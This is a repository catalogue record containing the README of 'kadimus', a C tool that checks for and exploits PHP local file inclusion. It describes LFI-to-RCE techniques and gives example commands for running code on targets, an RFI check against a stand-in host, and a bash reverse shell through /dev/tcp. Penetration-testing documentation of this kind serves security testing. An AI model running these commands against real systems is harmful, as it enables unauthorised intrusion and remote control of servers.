{"id":13362471,"url":"https://github.com/P0cL4bs/kadimus","last_synced_at":"2025-03-12T15:30:56.118Z","repository":{"id":34254289,"uuid":"38138575","full_name":"P0cL4bs/kadimus","owner":"P0cL4bs","description":"kadimus is a tool to check and exploit lfi vulnerability.","archived":true,"fork":false,"pushed_at":"2020-08-17T12:01:23.000Z","size":245,"stargazers_count":513,"open_issues_count":7,"forks_count":129,"subscribers_count":31,"default_branch":"master","last_synced_at":"2024-11-03T04:32:20.747Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/P0cL4bs.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"license.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-06-26T23:20:53.000Z","updated_at":"2024-11-01T18:37:19.000Z","dependencies_parsed_at":"2022-08-20T11:50:22.378Z","dependency_job_id":null,"html_url":"https://github.com/P0cL4bs/kadimus","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P0cL4bs%2Fkadimus","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P0cL4bs%2Fkadimus/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P0cL4bs%2Fkadimus/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P0cL4bs%2Fkadimus/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/P0cL4bs","download_url":"https://codeload.github.com/P0cL4bs/kadimus/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243242705,"owners_count":20259805,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-29T23:00:48.856Z","updated_at":"2025-03-12T15:30:55.762Z","avatar_url":"https://github.com/P0cL4bs.png","language":"C","funding_links":["https://www.paypal.com/cgi-bin/webscr?cmd=_donations\u0026business=RAG26EKAYHQSY\u0026currency_code=BRL\u0026source=url"],"categories":["Pentesting","📦 Legacy \u0026 Inactive Projects"],"sub_categories":["Payloads"],"readme":" [![Rawsec's CyberSecurity Inventory](https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.rawsec.ml/tools.html#Kadimus)\n [![GitHub stars](https://img.shields.io/github/stars/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/stargazers)\n [![GitHub license](https://img.shields.io/github/license/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/blob/master/license.txt)\n\n# kadimus\nLFI Scan \u0026amp; Exploit Tool\n--\nkadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.\n\nFeatures:\n\n- [x] Check all url parameters\n- [x] /var/log/auth.log RCE\n- [x] /proc/self/environ RCE\n- [x] php://input RCE\n- [x] data://text RCE\n- [x] expect://cmd RCE\n- [x] Source code disclosure\n- [x] Command shell interface through HTTP request\n- [x] Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)\n- [x] Proxy socks5 support for remote connections\n\n## Compile:\n\nFirst, make sure you have all dependencies installed in your system: `libcurl`, `libopenssl`, `libpcre` and `libssh`.\n\nThen you can clone the repository, to get the source code:\n```sh\n$ git clone https://github.com/P0cL4bs/kadimus.git\n$ cd kadimus\n```\n\n### And finally:\n\n```sh\n$ make\n```\n\n## Options:\n\n```\nOptions:\n  -h, --help                    Display this help menu\n\n  Request:\n    -B, --cookie STRING         Set custom HTTP cookie header\n    -A, --user-agent STRING     User-Agent to send to server\n    --connect-timeout SECONDS   Maximum time allowed for connection\n    --retry NUMBER              Number of times to retry if connection fails\n    --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)\n\n  Scanner:\n    -u, --url STRING            URL to scan/exploit\n    -o, --output FILE           File to save output results\n\n  Explotation:\n    --parameter STRING          Parameter name to inject exploit\n                                (only needed by RCE data and source disclosure)\n\n  RCE:\n    -T, --technique=TECH        LFI to RCE technique to use\n    -C, --code STRING           Custom PHP code to execute, with php brackets\n    -c, --cmd STRING            Execute system command on vulnerable target system\n    -s, --shell                 Simple command shell interface through HTTP request\n\n    --connect STRING            IP/hostname to connect to\n    -p, --port NUMBER           Port number to connect to or listen on\n    -l, --listen                Bind and listen for incoming connections\n\n    --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)\n    --ssh-target STRING         Set the SSH host\n\n    RCE Available techniques\n\n      environ                   Try to run PHP code using /proc/self/environ\n      input                     Try to run PHP code using php://input\n      auth                      Try to run PHP code using /var/log/auth.log\n      data                      Try to run PHP code using data://text\n      expect                    Try to run a command using expect://cmd\n\n    Source Disclosure:\n      -S, --source              Try to get the source file using filter://\n      -f, --filename STRING     Set filename to grab source [REQUIRED]\n      -O FILE                   Set output file (default: stdout)\n\n```\n\n## Examples:\n\n### Scanning:\n```\n./kadimus -u localhost/?pg=contact -A my_user_agent\n```\n\n### Get source code of file:\n```\n./kadimus -u localhost/?pg=contact -S -f \"index.php%00\" -O local_output.php --parameter pg\n```\n\n### Execute php code:\n```\n./kadimus -u localhost/?pg=php://input%00 -C '\u003c?php echo \"pwned\"; ?\u003e' -T input\n```\n\n### Execute command:\n```\n./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost\n```\n\n### Checking for RFI:\n\nYou can also check for RFI errors -- just put the remote URL in resource/common_files.txt\nand the regex to identify them, example:\n\n```php\n/* http://bad-url.com/shell.txt */\n\u003c?php echo base64_decode(\"c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU=\"); ?\u003e\n```\n\nin file:\n```\nhttp://bad-url.com/shell.txt?:scorpion say get over here\n```\n\n### Reverse shell:\n```\n./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/172.17.0.1/1234 0\u003e\u00261\"' --retry-times 0\n```\n\nContributing\n------------\nYou can help with code, or by donating.\nIf you want to help with code, use the kernel code style as a reference.\n\nPaypal: [![](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations\u0026business=RAG26EKAYHQSY\u0026currency_code=BRL\u0026source=url)\n\nBTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FP0cL4bs%2Fkadimus","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FP0cL4bs%2Fkadimus","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FP0cL4bs%2Fkadimus/lists"}